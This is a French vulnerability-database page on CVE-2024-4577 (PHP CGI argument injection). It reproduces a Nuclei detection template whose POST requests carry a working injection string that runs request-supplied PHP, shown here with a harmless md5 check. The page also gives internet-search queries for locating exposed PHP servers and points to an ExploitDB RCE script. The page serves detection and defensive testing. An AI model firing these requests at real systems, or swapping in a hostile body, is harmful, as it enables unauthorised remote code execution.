Exploit matérialisé
CVE-2024-4577
CRITICAL KEV2 exploit(s) public(s) pour cette CVE, 1 matérialisé(s) avec leur code.
À des fins de recherche défensive uniquement. Ne testez que sur des systèmes que vous possédez ou pour lesquels vous détenez une autorisation écrite. L'accès non autorisé est illégal.
Nuclei
critical Vérifié
Source
PHP CGI - Argument Injection
Par projectdiscovery
Comment tester cet exploit
Le template Nuclei EST le test : une règle de détection exécutable. Installez nuclei, puis lancez-le contre une cible que vous contrôlez.
nuclei -id CVE-2024-4577 -u https://your-target
Template yaml
id: CVE-2024-4577
info:
name: PHP CGI - Argument Injection
author: Hüseyin TINTAŞ,sw0rk17,s4e-io,pdresearch
severity: critical
description: |
PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.
impact: |
Successful exploitation could lead to remote code execution on the affected system.
remediation: |
Apply the vendor-supplied patches or upgrade to a non-vulnerable version.
reference:
- https://s4e.io/tools/php-cgi-code-injection-cve-2024-4577
- http://www.openwall.com/lists/oss-security/2024/06/07/1
- https://blog.orange.tw/2024/06/cve-2024-4577-yet-another-php-rce.html
- https://cert.be/en/advisory/warning-php-remote-code-execution-patch-immediately
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-4577
cwe-id: CWE-78
epss-score: 0.99987
epss-percentile: 0.99983
cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: php
product: php
shodan-query:
- cpe:"cpe:2.3:a:php:php"
- http.title:"php warning" || "fatal error"
- php.ini
- the requested resource <code class="url">
- x-powered-by:"php"
fofa-query: title="php warning" || "fatal error"
google-query: intitle:"php warning" || "fatal error"
tags: cve,cve2024,php,cgi,rce,kev,vkev,vuln
http:
- method: POST
path:
- "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
body: |
<?php echo md5("CVE-2024-4577"); ?>
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "3f2ba4ab3b260f4c2dc61a6fac7c3e8a"
# digest: 4a0a0047304502200bf4fb6c504f55bbe284108b56af86da412c1b5a62aee3908a965ca1abc1b06a022100d59df3e7c0cf3bb023a09faec6fdc69371fe8961bb05fea0aa4a8d1a3448d12f:922c64590222798bb761d5b6d8e72950
ExploitDB
webapps php
Source
PHP CGI Module 8.3.4 - Remote Code Execution (RCE)
Par İbrahimsql
Comment tester cet exploit
Exploit web. Déployez une instance vulnérable en lab, servez le script/la requête contre elle et observez la réponse.
python3 52331.py
Code
Contenu pas encore matérialisé (récupéré au prochain cycle).
Voir à la source